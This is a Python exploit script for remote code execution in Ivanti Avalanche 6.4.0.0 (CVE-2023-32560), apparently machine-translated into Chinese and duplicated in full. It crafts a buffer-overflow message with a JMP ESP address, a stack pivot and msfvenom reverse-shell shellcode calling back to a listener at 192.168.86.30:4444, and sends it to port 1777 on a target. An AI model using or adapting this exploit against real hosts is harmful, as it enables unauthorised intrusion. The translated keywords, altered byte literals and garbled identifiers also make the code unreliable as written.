'''
exploit title: ivanti avalanche v6.4.0.0-远程代码执行
日期: 2023-08-16
剥削作者:罗伯尔马云惹不起马云坎贝尔(@RobelCampbell)
供应商HomePage: https://www.ivanti.com/
软件link: https://www.wavelink.com/download/downloads.aspx?downloadfile=27550 returnurl=/download-avalanche_mobile-device-management-software/
版本: V6.4.0.0
在: Windows 11 21H2上测试
CVE: CVE-2023-32560
参考: https://www.tenable.com/security/research/tra-2023-27
'''
导入套接字
导入结构
导入系统
#为标头创建项目结构和有效载荷
类项目:
def __init __(self,type_,name,value):
self.type=type_
self.name=name.encode()
self.value=值
self.name_size=0x5
self.value_size=0x800
DEF PACK(self):
返回struct.pack('iii {} s {} s'.format(self.name_size,self.value_size),
self.type,self.name_size,self.value_size,self.name,self.value)
#创建标头结构
类HP:
def __init __(self,hdr,有效载荷):
self.hdr=hdr
self.payload=有效载荷
self.pad=b'\ x00' *(16-(len(self.hdr) + len(self.payload))%16)
DEF PACK(self):
返回b''。join(self.hdr中的项目) + \
b''。join(for self.payload中的项目) + self.pad
#创建一个序言结构
类前台:
def __init __(self,hp):
self.msg_size=len(hp.pack()) + 16
self.hdr_size=sum([len(item.pack())hp.hdr中的项目])
self.payload_size=sum([len(item.pack())在hp.payload中的项目])
self.ink=0#未知值
DEF PACK(self):
return struct.pack('iiii',self.msg_size,self.hdr_size,self.payload_size,self.ink)
#创建消息结构
类MSG:
def __init __(self,hp):
self.pre=序言(hp)
self.hdrpay=hp
DEF PACK(self):
返回self.pre.pack() + self.hdrpay.pack()
#msfvenom -p Windows/shell_reverse_tcp lhost=192.168.86.30 lport=4444 exitfunc=thread -f python
shellCode=b''
ShellCode +=B'FCE8820000006089E531C064'
shellCode +=B'8B50308B520C8B52148B7228'
ShellCode +=B'0FB74A2631FFAC3C617C022C'
ShellCode +=B'20C1CF0D01C7E2F252578B52'
shellCode +=B'108B4A3C8B4C1178E34801D1'
shellCode +=B'518B592001D38B4918E33A49'
shellcode +=b'8b348b01d631ffacc1cf0d01'
shellCode +=B'C738E075F6037DF83B7D2475'
shellCode +=B'E4588B582401D3668B0C4B8B'
shellCode +=B'581C01D38B048B01D0894424'
shellcode +=B'245b5b61595a51ffe05f5f5a'
shellCode +=B'8B12EB8D5D56833200006877'
shellCode +=B'73325F54684C772607FFD5B8'
shellCode +=B'9001000029C454506829806B'
shellCode +=B'00FFD5505050504050405068'
shellcode +=b'ea0fdfe0ffd5976a0568c0a8'
shellCode +=B'561E680200115C89E66A1056'
shellCode +=B'576899A57461FFD585C0740C'
shellCode +=B'FF4E0875EC68F0B5A256FFD5'
shellCode +=B'68636D640089E357575731F6'
shellCode +=B'6A125956E2FD66C744243C01'
shellCode +=B'018D442410C60044454505656'
shellCode +=B'5646564E565656566879CC3F'
ShellCode +=B'86FFD589E04E5646FF306808'
shellCode +=B'871D60FFD5BBE01D2A0A68A6'
shellCode +=B'95BD9DFFD53C067C0A80FBE0'
shellCode +=B'7505BB4713726F6A0053FFD5'
buf=b'90' * 340
BUF +=B'812B4100'#JMP ESP(0x00412b81)
buf +=B'90909090'
buf +=B'90909090'
buf +=shellCode
buf +=b'41' * 80
buf +=B'84d45200'#堆栈Pivot:添加ESP,0x0000FA0; retn0x0004; (0x0052D484)
buf +=b'43' *(0x800 -len(buf))
buf2=b'41' *0x1000
#创建消息有效载荷
hdr=[item(3,'pwned',buf)]
有效载荷=[item(3,'pwned',buf2)]#虚拟有效载荷,概率不需要
HP_INSTANCE=HP(HDR,有效载荷)
msg_instance=msg(hp_instance)
#默认端口
端口=1777
#检查目标主机参数
如果Len(sys.argv)1:
主机=sys.argv [1]
其他:
打印('USAGE: PYTHON3 CVE-2023-32560.PY主机IP')
sys.exit()
使用socket.socket(socket.aft_inet,socket.sock_stream)作为s:
s.connect((主机,端口))
S.Sendall(msg_instance.pack())
打印(“消息发送!”)
s.close()
exploit title: ivanti avalanche v6.4.0.0-远程代码执行
日期: 2023-08-16
剥削作者:罗伯尔马云惹不起马云坎贝尔(@RobelCampbell)
供应商HomePage: https://www.ivanti.com/
软件link: https://www.wavelink.com/download/downloads.aspx?downloadfile=27550 returnurl=/download-avalanche_mobile-device-management-software/
版本: V6.4.0.0
在: Windows 11 21H2上测试
CVE: CVE-2023-32560
参考: https://www.tenable.com/security/research/tra-2023-27
'''
导入套接字
导入结构
导入系统
#为标头创建项目结构和有效载荷
类项目:
def __init __(self,type_,name,value):
self.type=type_
self.name=name.encode()
self.value=值
self.name_size=0x5
self.value_size=0x800
DEF PACK(self):
返回struct.pack('iii {} s {} s'.format(self.name_size,self.value_size),
self.type,self.name_size,self.value_size,self.name,self.value)
#创建标头结构
类HP:
def __init __(self,hdr,有效载荷):
self.hdr=hdr
self.payload=有效载荷
self.pad=b'\ x00' *(16-(len(self.hdr) + len(self.payload))%16)
DEF PACK(self):
返回b''。join(self.hdr中的项目) + \
b''。join(for self.payload中的项目) + self.pad
#创建一个序言结构
类前台:
def __init __(self,hp):
self.msg_size=len(hp.pack()) + 16
self.hdr_size=sum([len(item.pack())hp.hdr中的项目])
self.payload_size=sum([len(item.pack())在hp.payload中的项目])
self.ink=0#未知值
DEF PACK(self):
return struct.pack('iiii',self.msg_size,self.hdr_size,self.payload_size,self.ink)
#创建消息结构
类MSG:
def __init __(self,hp):
self.pre=序言(hp)
self.hdrpay=hp
DEF PACK(self):
返回self.pre.pack() + self.hdrpay.pack()
#msfvenom -p Windows/shell_reverse_tcp lhost=192.168.86.30 lport=4444 exitfunc=thread -f python
shellCode=b''
ShellCode +=B'FCE8820000006089E531C064'
shellCode +=B'8B50308B520C8B52148B7228'
ShellCode +=B'0FB74A2631FFAC3C617C022C'
ShellCode +=B'20C1CF0D01C7E2F252578B52'
shellCode +=B'108B4A3C8B4C1178E34801D1'
shellCode +=B'518B592001D38B4918E33A49'
shellcode +=b'8b348b01d631ffacc1cf0d01'
shellCode +=B'C738E075F6037DF83B7D2475'
shellCode +=B'E4588B582401D3668B0C4B8B'
shellCode +=B'581C01D38B048B01D0894424'
shellcode +=B'245b5b61595a51ffe05f5f5a'
shellCode +=B'8B12EB8D5D56833200006877'
shellCode +=B'73325F54684C772607FFD5B8'
shellCode +=B'9001000029C454506829806B'
shellCode +=B'00FFD5505050504050405068'
shellcode +=b'ea0fdfe0ffd5976a0568c0a8'
shellCode +=B'561E680200115C89E66A1056'
shellCode +=B'576899A57461FFD585C0740C'
shellCode +=B'FF4E0875EC68F0B5A256FFD5'
shellCode +=B'68636D640089E357575731F6'
shellCode +=B'6A125956E2FD66C744243C01'
shellCode +=B'018D442410C60044454505656'
shellCode +=B'5646564E565656566879CC3F'
ShellCode +=B'86FFD589E04E5646FF306808'
shellCode +=B'871D60FFD5BBE01D2A0A68A6'
shellCode +=B'95BD9DFFD53C067C0A80FBE0'
shellCode +=B'7505BB4713726F6A0053FFD5'
buf=b'90' * 340
BUF +=B'812B4100'#JMP ESP(0x00412b81)
buf +=B'90909090'
buf +=B'90909090'
buf +=shellCode
buf +=b'41' * 80
buf +=B'84d45200'#堆栈Pivot:添加ESP,0x0000FA0; retn0x0004; (0x0052D484)
buf +=b'43' *(0x800 -len(buf))
buf2=b'41' *0x1000
#创建消息有效载荷
hdr=[item(3,'pwned',buf)]
有效载荷=[item(3,'pwned',buf2)]#虚拟有效载荷,概率不需要
HP_INSTANCE=HP(HDR,有效载荷)
msg_instance=msg(hp_instance)
#默认端口
端口=1777
#检查目标主机参数
如果Len(sys.argv)1:
主机=sys.argv [1]
其他:
打印('USAGE: PYTHON3 CVE-2023-32560.PY主机IP')
sys.exit()
使用socket.socket(socket.aft_inet,socket.sock_stream)作为s:
s.connect((主机,端口))
S.Sendall(msg_instance.pack())
打印(“消息发送!”)
s.close()
